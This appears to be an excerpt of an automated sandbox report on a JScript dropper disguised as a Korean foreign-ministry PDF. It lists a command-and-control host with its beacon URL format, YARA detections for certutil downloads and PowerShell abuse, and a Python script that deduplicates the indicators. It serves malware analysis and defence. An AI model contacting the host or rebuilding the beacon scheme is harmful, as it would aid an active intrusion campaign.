Source: regsvr32.exe, 00000021.00000003.966324102.0000000001389000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190n |
Source: regsvr32.exe, 00000021.00000003.651691980.0000000003BC2000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190o |
Source: regsvr32.exe, 00000021.00000003.756664899.0000000003717000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190p |
Source: regsvr32.exe, 00000021.00000003.658877591.0000000003C6F000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190p(1 |
Source: regsvr32.exe, 00000021.00000003.644711545.0000000003814000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190p2=Win10.0.17134x64-S_Regsvr32-v2.0.69 |
Source: regsvr32.exe, 00000021.00000003.661111972.00000000037C8000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190p2=Win10.0.17134x64-S_Regsvr32-v2.0.69F |
Source: regsvr32.exe, 00000021.00000003.661111972.00000000037C8000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190p2=Win10.0.17134x64-S_Regsvr32-v2.0.69T |
Source: regsvr32.exe, 00000021.00000003.878428282.0000000003814000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190pLk |
Source: regsvr32.exe, 00000021.00000003.856631887.00000000037B2000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190q |
Source: regsvr32.exe, 00000021.00000003.651949010.0000000003C14000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190qB |
Source: regsvr32.exe, 00000021.00000003.966324102.0000000001389000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190r |
Source: regsvr32.exe, 00000021.00000003.659792484.0000000003CC7000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190s |
Source: regsvr32.exe, 00000021.00000003.756664899.0000000003717000.00000004.00000001.sdmp, regsvr32.exe, 00000021.00000003.659792484.0000000003CC7000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190t |
Source: regsvr32.exe, 00000021.00000003.856631887.00000000037B2000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190u |
Source: regsvr32.exe, 00000021.00000003.651949010.0000000003C14000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190uB |
Source: regsvr32.exe, 00000021.00000003.651949010.0000000003C14000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190uC |
Source: regsvr32.exe, 00000021.00000003.655249757.0000000003E0A000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190uN& |
Source: regsvr32.exe, 00000021.00000003.966324102.0000000001389000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190v |
Source: regsvr32.exe, 00000021.00000003.661377377.0000000003722000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190v~ |
Source: regsvr32.exe, 00000021.00000003.661111972.00000000037C8000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190wP |
Source: regsvr32.exe, 00000021.00000003.756664899.0000000003717000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190x |
Source: regsvr32.exe, 00000021.00000003.659792484.0000000003CC7000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190xt |
Source: regsvr32.exe, 00000021.00000003.856631887.00000000037B2000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190y |
Source: regsvr32.exe, 00000021.00000003.651949010.0000000003C14000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190yC6 |
Source: regsvr32.exe, 00000021.00000003.966324102.0000000001389000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190z |
Source: regsvr32.exe, 00000021.00000003.655249757.0000000003E0A000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190~N |
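The `m=d&p1=8ace1190…` rows above are one beacon URL read out of regsvr32.exe heap memory with a few bytes of whatever followed it appended (`lN/`, `~N`, `p2=Win10…` and so on), which is why a single URL shows up dozens of times with different tails. Below is an added example, not part of the report, that normalizes such rows into unique beacon shapes so that the IOC list collapses to the real values: it assumes `p1` is an 8-hex-character identifier and that `p2` ends at the `-v2.0.69` version token, both inferred from the cleanest strings in the list rather than documented by the report, and it treats a `p2=` fragment sitting in the junk after `p1` as the neighbouring parameter overwritten into the same buffer. The sample rows are the report's own URLs plus a constructed `m=a` row and a constructed CRL control.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Constructed sample input: "String found in binary or memory" rows in the
# report's own layout. The m=d URLs are copied from the rows above; the m=a
# row and the CRL row are constructed controls, not taken from the report.
SAMPLE_LINES = [
    "Source: regsvr32.exe, 00000021.00000003.655249757.0000000003E0A000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190lN/ |",
    "Source: regsvr32.exe, 00000021.00000003.856631887.00000000037B2000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190m |",
    "Source: regsvr32.exe, 00000021.00000003.644711545.0000000003814000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190p2=Win10.0.17134x64-S_Regsvr32-v2.0.69 |",
    "Source: regsvr32.exe, 00000021.00000003.661111972.00000000037C8000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190p2=Win10.0.17134x64-S_Regsvr32-v2.0.69F |",
    "Source: regsvr32.exe, 00000021.00000003.655249757.0000000003E0A000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190uN& |",
    "Source: regsvr32.exe, 00000021.00000003.655249757.0000000003E0A000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190~N |",
    # Constructed: the same beacon with p2 carried as its own parameter.
    "Source: regsvr32.exe, 00000021.00000003.000000000.0000000000000000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69C |",
    # Constructed control: an unrelated URL that must be ignored.
    "Source: powershell.exe, 00000004.00000002.000000000.0000000000000000.00000004.00000001.sdmp | String found in binary or memory: http://crl.example.test/root.crl |",
]

URL_RE = re.compile(r"String found in binary or memory: (\S+)")
P1_RE = re.compile(r"^[0-9a-f]{8}")            # assumption: p1 is an 8-hex-char id
P2_RE = re.compile(r"^.*?-v\d+\.\d+\.\d+")     # assumption: p2 ends at -v<major>.<minor>.<build>


def clean_p1(raw):
    """Split a p1 value read past its terminator into (id, trailing_junk)."""
    m = P1_RE.match(raw)
    if not m:
        return None, raw
    return m.group(0), raw[m.end():]


def clean_p2(raw):
    """Cut a p2 fingerprint at its version token, dropping trailing heap bytes."""
    m = P2_RE.match(raw)
    return m.group(0) if m else None


def normalize_beacon(url, c2_host):
    """Return (mode, p1, p2) for a beacon URL on c2_host, else None."""
    parts = urlsplit(url)
    if parts.hostname != c2_host:
        return None
    q = parse_qs(parts.query)
    mode = q.get("m", [""])[0]
    p1, junk = clean_p1(q.get("p1", [""])[0])
    if p1 is None:
        return None
    p2_raw = q.get("p2", [None])[0]
    if p2_raw is None and "p2=" in junk:
        # Overlapping-buffer artefact: the p2 parameter was read as part of p1.
        p2_raw = junk.split("p2=", 1)[1]
    p2 = clean_p2(p2_raw) if p2_raw else None
    return mode, p1, p2


def extract_beacons(lines, c2_host="texts.letterpaper.press"):
    """Count unique (mode, p1, p2) beacon shapes across memory-string rows."""
    counts = Counter()
    for line in lines:
        m = URL_RE.search(line)
        if not m:
            continue
        beacon = normalize_beacon(m.group(1), c2_host)
        if beacon is not None:
            counts[beacon] += 1
    return counts


if __name__ == "__main__":
    for beacon, n in sorted(extract_beacons(SAMPLE_LINES).items()):
        print(n, beacon)
```

Running it on the eight rows yields three shapes: `('d', '8ace1190', None)` four times, `('d', '8ace1190', 'Win10.0.17134x64-S_Regsvr32-v2.0.69')` twice (the p2 recovered from the junk tail), and the constructed `m=a` row once; the CRL row is dropped by the host check. Feeding the report's full list through the same function is how to get a short, deduplicated IOC set from the raw memory dump instead of thirty near-identical URLs.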
Source: 외교부 가판 2021-05-07.pdf.jse, type: SAMPLE | Matched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889 |
Source: 00000000.00000002.562447318.0000027E99742000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29 |
Source: 00000000.00000003.536073175.0000027E9967A000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29 |
Source: 00000000.00000003.537403999.0000027E996A4000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29 |
Source: 00000004.00000002.445490921.0000022E1F0E2000.00000004.00000020.sdmp, type: MEMORY | Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29 |
Source: 00000021.00000003.657307580.0000000004F17000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29 |
Source: 00000000.00000003.544459351.0000027E99732000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29 |
Source: 00000000.00000003.534562796.0000027E99708000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29 |
Source: 00000004.00000002.454006767.0000022E214AA000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29 |
Source: 00000004.00000002.453909044.0000022E2144F000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29 |
Source: 00000000.00000003.534889418.0000027E99708000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29 |
Source: 00000000.00000003.546366739.0000027E9B3E9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29 |
Source: 00000004.00000002.445327272.0000022E1F060000.00000004.00000020.sdmp, type: MEMORY | Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29 |
Source: 00000000.00000002.562500921.0000027E9993A000.00000004.00000040.sdmp, type: MEMORY | Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29 |
Source: 00000000.00000003.535487473.0000027E9CCB6000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29 |
Source: 00000000.00000003.535487473.0000027E9CCB6000.00000004.00000001.sdmp, type: MEMORY | Matched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889 |
Source: 00000000.00000003.545823503.0000027E9CCB6000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29 |
Source: 00000000.00000003.545823503.0000027E9CCB6000.00000004.00000001.sdmp, type: MEMORY | Matched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889 |
Source: 00000000.00000003.559995374.0000027E99740000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29 |
Source: 00000000.00000003.399402263.0000027E9B3C3000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29 |
Source: 00000000.00000002.562513728.0000027E9993D000.00000004.00000001.sdmp, type: MEMORY | Matched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889 |
Source: 00000000.00000003.547005043.0000027E9B3CF000.00000004.00000001.sdmp, type: MEMORY | Matched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889 |
Source: 00000000.00000003.427755304.0000027E9B3E1000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29 |
Source: 00000000.00000003.427755304.0000027E9B3E1000.00000004.00000001.sdmp, type: MEMORY | Matched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889 |
Source: 00000000.00000003.547727779.0000027E9B3E1000.00000004.00000001.sdmp, type: MEMORY | Matched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889 |
Source: 00000000.00000003.534727641.0000027E99677000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29 |
Source: 00000000.00000003.559503063.0000027E996A5000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29 |
Source: 00000000.00000003.551541440.0000027E9CD90000.00000004.00000001.sdmp, type: MEMORY | Matched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889 |
Source: 00000000.00000003.559948938.0000027EB69DF000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29 |
Source: 00000000.00000003.559831762.0000027E996A5000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29 |
Source: 00000000.00000003.539482612.0000027E99715000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29 |
Source: 00000000.00000002.569744930.0000027E9B3E2000.00000004.00000001.sdmp, type: MEMORY | Matched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889 |
Source: 00000000.00000003.534340935.0000027E9CCC6000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29 |
Source: 00000000.00000002.571001527.0000027E9CCB6000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29 |
Source: 00000000.00000002.571001527.0000027E9CCB6000.00000004.00000001.sdmp, type: MEMORY | Matched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889 |
Source: 00000000.00000003.546419483.0000027E9B3C6000.00000004.00000001.sdmp, type: MEMORY | Matched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889 |
Source: 00000000.00000003.549235895.0000027E99939000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29 |
Source: 00000000.00000003.540876716.0000027E9972A000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29 |
Source: 00000000.00000002.570828518.0000027E9CC69000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29 |
Source: 00000004.00000002.453777516.0000022E213DE000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29 |
Source: 00000000.00000002.571040593.0000027E9CCC6000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29 |
Source: 00000000.00000003.547572927.0000027E9993C000.00000004.00000001.sdmp, type: MEMORY | Matched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889 |
Source: 00000004.00000002.452214006.0000022E20FF2000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29 |
Source: Process Memory Space: wscript.exe PID: 7044, type: MEMORYSTR | Matched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889 |
Source: Process Memory Space: powershell.exe PID: 304, type: MEMORYSTR | Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file |
Source: Process Memory Space: powershell.exe PID: 304, type: MEMORYSTR | Matched rule: PowerShell_Susp_Parameter_Combo_RID336F date = 2017-03-12 14:47:41, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, type = file, reference = https://goo.gl/uAic1X, license = CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/, score = demo, minimum_yara = 1.7 |
Source: Process Memory Space: powershell.exe PID: 4168, type: MEMORYSTR | Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file |
Source: Process Memory Space: powershell.exe PID: 4168, type: MEMORYSTR | Matched rule: PowerShell_Susp_Parameter_Combo_RID336F date = 2017-03-12 14:47:41, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, type = file, reference = https://goo.gl/uAic1X, license = CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/, score = demo, minimum_yara = 1.7 |
Source: Process Memory Space: regsvr32.exe PID: 2052, type: MEMORYSTR | Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29 |
Source: C:\Users\user\Documents\20210825\PowerShell_transcript.910646.c593w7K1.20210825105827.txt, type: DROPPED | Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29 |
Source: C:\ProgramData\temp\1673.tmp-PowerShell_transcript.910646.c593w7K1.20210825105827.txt, type: DROPPED | Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 13_2_00007FF983DB72C0 | 13_2_00007FF983DB72C0 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 13_2_00007FF983DB79B0 | 13_2_00007FF983DB79B0 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 13_2_00007FF983DB7EB0 | 13_2_00007FF983DB7EB0 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 13_2_00007FF983DA84D0 | 13_2_00007FF983DA84D0 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 13_2_00007FF983D98320 | 13_2_00007FF983D98320 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 13_2_00007FF983DD82F0 | 13_2_00007FF983DD82F0 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 13_2_00007FF983DD22A4 | 13_2_00007FF983DD22A4 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 13_2_00007FF983DC6260 | 13_2_00007FF983DC6260 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 13_2_00007FF983DB1160 | 13_2_00007FF983DB1160 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 13_2_00007FF983DD1110 | 13_2_00007FF983DD1110 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 13_2_00007FF983D9A860 | 13_2_00007FF983D9A860 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 13_2_00007FF983DC676C | 13_2_00007FF983DC676C |
Source: C:\Windows\System32\regsvr32.exe | Code function: 13_2_00007FF983DBF76C | 13_2_00007FF983DBF76C |
Source: C:\Windows\System32\regsvr32.exe | Code function: 13_2_00007FF983DB4750 | 13_2_00007FF983DB4750 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 13_2_00007FF983DCC714 | 13_2_00007FF983DCC714 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 13_2_00007FF983D99710 | 13_2_00007FF983D99710 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 13_2_00007FF983DB66E0 | 13_2_00007FF983DB66E0 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 13_2_00007FF983DD06F0 | 13_2_00007FF983DD06F0 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 13_2_00007FF983DC85A0 | 13_2_00007FF983DC85A0 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 13_2_00007FF983DD7570 | 13_2_00007FF983DD7570 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 13_2_00007FF983DBF504 | 13_2_00007FF983DBF504 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 13_2_00007FF983DD84FC | 13_2_00007FF983DD84FC |
Source: C:\Windows\System32\regsvr32.exe | Code function: 13_2_00007FF983DDA4EC | 13_2_00007FF983DDA4EC |
Source: C:\Windows\System32\regsvr32.exe | Code function: 13_2_00007FF983DC8CB0 | 13_2_00007FF983DC8CB0 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 13_2_00007FF983D9AB80 | 13_2_00007FF983D9AB80 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 13_2_00007FF983DD2B3C | 13_2_00007FF983DD2B3C |
Source: C:\Windows\System32\regsvr32.exe | Code function: 13_2_00007FF983DA0B30 | 13_2_00007FF983DA0B30 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 13_2_00007FF983D989D0 | 13_2_00007FF983D989D0 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 13_2_00007FF983DB5990 | 13_2_00007FF983DB5990 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 13_2_00007FF983DA7940 | 13_2_00007FF983DA7940 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 13_2_00007FF983D96950 | 13_2_00007FF983D96950 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 13_2_00007FF983DD48EC | 13_2_00007FF983DD48EC |
Source: C:\Windows\System32\regsvr32.exe | Code function: 13_2_00007FF983D99080 | 13_2_00007FF983D99080 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 13_2_00007FF983D95050 | 13_2_00007FF983D95050 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 13_2_00007FF983DA7020 | 13_2_00007FF983DA7020 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 13_2_00007FF983D99FE0 | 13_2_00007FF983D99FE0 |
Source: C:\Windows\System32\regsvr32.exe | Code function: 13_2_00007FF983DAAF60 | 13_2_00007FF983DAAF60 |
